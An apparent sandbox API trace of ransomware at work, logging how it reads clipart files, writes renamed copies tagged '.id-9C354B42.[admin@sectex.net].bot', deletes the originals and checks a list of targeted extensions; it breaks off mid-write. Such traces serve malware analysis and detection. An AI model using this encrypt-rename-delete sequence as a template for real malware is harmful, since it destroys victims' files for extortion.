	[0155.482] WriteFile (in: hFile=0x3bc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x7dc0, lpOverlapped=0x0) returned 1
	[0155.483] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.483] WriteFile (in: hFile=0x3bc, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.483] SetEndOfFile (hFile=0x3bc) returned 1
	[0155.483] CloseHandle (hObject=0x3bc) returned 1
	[0155.483] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.483] SetEndOfFile (hFile=0x384) returned 1
	[0155.486] CloseHandle (hObject=0x384) returned 1
	[0155.486] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.755] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0101866.bmp")) returned 1
	[0155.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.776] lstrlenW (lpString=".doc") returned 4
	[0155.777] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.777] lstrlenW (lpString=".docx") returned 5
	[0155.777] lstrcmpiW (lpString1=".docx", lpString2="6.BMP") returned -1
	[0155.777] lstrlenW (lpString=".pdf") returned 4
	[0155.777] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.777] lstrlenW (lpString=".xls") returned 4
	[0155.777] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.777] lstrlenW (lpString=".xlsx") returned 5
	[0155.777] lstrcmpiW (lpString1=".xlsx", lpString2="6.BMP") returned -1
	[0155.777] lstrlenW (lpString=".ppt") returned 4
	[0155.777] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.777] lstrlenW (lpString=".zip") returned 4
	[0155.777] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.777] lstrlenW (lpString=".rar") returned 4
	[0155.777] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.777] lstrlenW (lpString=".bz2") returned 4
	[0155.777] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.777] lstrlenW (lpString=".7z") returned 3
	[0155.777] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.777] lstrlenW (lpString=".dbf") returned 4
	[0155.777] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.777] lstrlenW (lpString=".1cd") returned 4
	[0155.777] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.777] lstrlenW (lpString=".jpg") returned 4
	[0155.777] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.778] lstrlenW (lpString=".doc") returned 4
	[0155.778] lstrcmpiW (lpString1=".doc", lpString2=".BMP") returned 1
	[0155.778] lstrlenW (lpString=".docx") returned 5
	[0155.778] lstrcmpiW (lpString1=".docx", lpString2="6.BMP") returned -1
	[0155.778] lstrlenW (lpString=".pdf") returned 4
	[0155.778] lstrcmpiW (lpString1=".pdf", lpString2=".BMP") returned 1
	[0155.778] lstrlenW (lpString=".xls") returned 4
	[0155.778] lstrcmpiW (lpString1=".xls", lpString2=".BMP") returned 1
	[0155.778] lstrlenW (lpString=".xlsx") returned 5
	[0155.778] lstrcmpiW (lpString1=".xlsx", lpString2="6.BMP") returned -1
	[0155.778] lstrlenW (lpString=".ppt") returned 4
	[0155.778] lstrcmpiW (lpString1=".ppt", lpString2=".BMP") returned 1
	[0155.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.778] lstrlenW (lpString=".zip") returned 4
	[0155.778] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1
	[0155.778] lstrlenW (lpString=".rar") returned 4
	[0155.778] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1
	[0155.778] lstrlenW (lpString=".bz2") returned 4
	[0155.778] lstrcmpiW (lpString1=".bz2", lpString2=".BMP") returned 1
	[0155.778] lstrlenW (lpString=".7z") returned 3
	[0155.778] lstrcmpiW (lpString1=".7z", lpString2="BMP") returned -1
	[0155.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.778] lstrlenW (lpString=".dbf") returned 4
	[0155.778] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1
	[0155.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.778] lstrlenW (lpString=".1cd") returned 4
	[0155.778] lstrcmpiW (lpString1=".1cd", lpString2=".BMP") returned -1
	[0155.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0101866.BMP") returned 63
	[0155.778] lstrlenW (lpString=".jpg") returned 4
	[0155.778] lstrcmpiW (lpString1=".jpg", lpString2=".BMP") returned 1
	[0155.779] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.779] lstrlenW (lpString="J0102594.WMF") returned 12
	[0155.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102594.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0155.779] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=27000) returned 1
	[0155.779] CloseHandle (hObject=0x39c) returned 1
	[0155.780] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102594.wmf")) returned 0x20
	[0155.780] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102594.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102594.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0155.780] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.780] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102594.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.781] GetLastError () returned 0x0
	[0155.781] ReadFile (in: hFile=0x39c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x6978, lpOverlapped=0x0) returned 1
	[0155.797] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x6980, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x6980, lpOverlapped=0x0) returned 1
	[0155.798] ReadFile (in: hFile=0x39c, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.798] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.798] SetEndOfFile (hFile=0x384) returned 1
	[0155.798] CloseHandle (hObject=0x384) returned 1
	[0155.798] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.798] SetEndOfFile (hFile=0x39c) returned 1
	[0155.801] CloseHandle (hObject=0x39c) returned 1
	[0155.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.866] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102594.wmf")) returned 1
	[0155.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.867] lstrlenW (lpString=".doc") returned 4
	[0155.867] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.867] lstrlenW (lpString=".docx") returned 5
	[0155.867] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0155.867] lstrlenW (lpString=".pdf") returned 4
	[0155.867] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.867] lstrlenW (lpString=".xls") returned 4
	[0155.867] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.867] lstrlenW (lpString=".xlsx") returned 5
	[0155.867] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0155.867] lstrlenW (lpString=".ppt") returned 4
	[0155.867] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.867] lstrlenW (lpString=".zip") returned 4
	[0155.867] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.867] lstrlenW (lpString=".rar") returned 4
	[0155.867] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.867] lstrlenW (lpString=".bz2") returned 4
	[0155.867] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.867] lstrlenW (lpString=".7z") returned 3
	[0155.867] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.867] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.867] lstrlenW (lpString=".dbf") returned 4
	[0155.868] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.868] lstrlenW (lpString=".1cd") returned 4
	[0155.868] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.868] lstrlenW (lpString=".jpg") returned 4
	[0155.868] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.868] lstrlenW (lpString=".doc") returned 4
	[0155.868] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.868] lstrlenW (lpString=".docx") returned 5
	[0155.868] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0155.868] lstrlenW (lpString=".pdf") returned 4
	[0155.868] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.868] lstrlenW (lpString=".xls") returned 4
	[0155.868] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.868] lstrlenW (lpString=".xlsx") returned 5
	[0155.868] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0155.868] lstrlenW (lpString=".ppt") returned 4
	[0155.868] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.868] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.868] lstrlenW (lpString=".zip") returned 4
	[0155.868] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.868] lstrlenW (lpString=".rar") returned 4
	[0155.868] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.868] lstrlenW (lpString=".bz2") returned 4
	[0155.868] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.868] lstrlenW (lpString=".7z") returned 3
	[0155.869] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.869] lstrlenW (lpString=".dbf") returned 4
	[0155.869] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.869] lstrlenW (lpString=".1cd") returned 4
	[0155.869] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.869] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102594.WMF") returned 63
	[0155.869] lstrlenW (lpString=".jpg") returned 4
	[0155.869] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.869] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.869] lstrlenW (lpString="J0102984.WMF") returned 12
	[0155.869] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102984.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0155.870] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=17040) returned 1
	[0155.870] CloseHandle (hObject=0x1b8) returned 1
	[0155.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102984.wmf")) returned 0x20
	[0155.870] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102984.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102984.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0155.870] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.870] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102984.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.871] GetLastError () returned 0x0
	[0155.871] ReadFile (in: hFile=0x1b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x4290, lpOverlapped=0x0) returned 1
	[0155.896] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x42a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x42a0, lpOverlapped=0x0) returned 1
	[0155.897] ReadFile (in: hFile=0x1b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0155.897] WriteFile (in: hFile=0x384, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0155.897] SetEndOfFile (hFile=0x384) returned 1
	[0155.897] CloseHandle (hObject=0x384) returned 1
	[0155.897] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.897] SetEndOfFile (hFile=0x1b8) returned 1
	[0155.900] CloseHandle (hObject=0x1b8) returned 1
	[0155.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0155.930] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0102984.wmf")) returned 1
	[0155.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.944] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.944] lstrlenW (lpString=".doc") returned 4
	[0155.944] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.944] lstrlenW (lpString=".docx") returned 5
	[0155.944] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0155.944] lstrlenW (lpString=".pdf") returned 4
	[0155.944] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.944] lstrlenW (lpString=".xls") returned 4
	[0155.944] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.944] lstrlenW (lpString=".xlsx") returned 5
	[0155.944] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0155.944] lstrlenW (lpString=".ppt") returned 4
	[0155.944] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.945] lstrlenW (lpString=".zip") returned 4
	[0155.945] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.945] lstrlenW (lpString=".rar") returned 4
	[0155.945] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.945] lstrlenW (lpString=".bz2") returned 4
	[0155.945] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.945] lstrlenW (lpString=".7z") returned 3
	[0155.945] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.945] lstrlenW (lpString=".dbf") returned 4
	[0155.945] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.945] lstrlenW (lpString=".1cd") returned 4
	[0155.945] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.945] lstrlenW (lpString=".jpg") returned 4
	[0155.945] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.945] lstrlenW (lpString=".doc") returned 4
	[0155.945] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0155.946] lstrlenW (lpString=".docx") returned 5
	[0155.946] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0155.946] lstrlenW (lpString=".pdf") returned 4
	[0155.946] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0155.946] lstrlenW (lpString=".xls") returned 4
	[0155.946] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0155.946] lstrlenW (lpString=".xlsx") returned 5
	[0155.946] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0155.946] lstrlenW (lpString=".ppt") returned 4
	[0155.946] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0155.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.946] lstrlenW (lpString=".zip") returned 4
	[0155.946] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0155.946] lstrlenW (lpString=".rar") returned 4
	[0155.946] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0155.946] lstrlenW (lpString=".bz2") returned 4
	[0155.946] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0155.946] lstrlenW (lpString=".7z") returned 3
	[0155.946] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0155.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.946] lstrlenW (lpString=".dbf") returned 4
	[0155.946] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0155.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.946] lstrlenW (lpString=".1cd") returned 4
	[0155.946] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0155.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0102984.WMF") returned 63
	[0155.946] lstrlenW (lpString=".jpg") returned 4
	[0155.946] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0155.947] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0155.947] lstrlenW (lpString="J0103812.WMF") returned 12
	[0155.947] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103812.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.947] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5908) returned 1
	[0155.947] CloseHandle (hObject=0x384) returned 1
	[0155.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103812.wmf")) returned 0x20
	[0155.947] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103812.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0155.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103812.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0155.948] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.948] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0155.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0103812.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0103812.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c
	[0155.950] GetLastError () returned 0x0
	[0155.950] ReadFile (in: hFile=0x384, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1714, lpOverlapped=0x0) returned 1
	[0156.034] WriteFile (in: hFile=0x39c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1720, lpOverlapped=0x0) returned 1
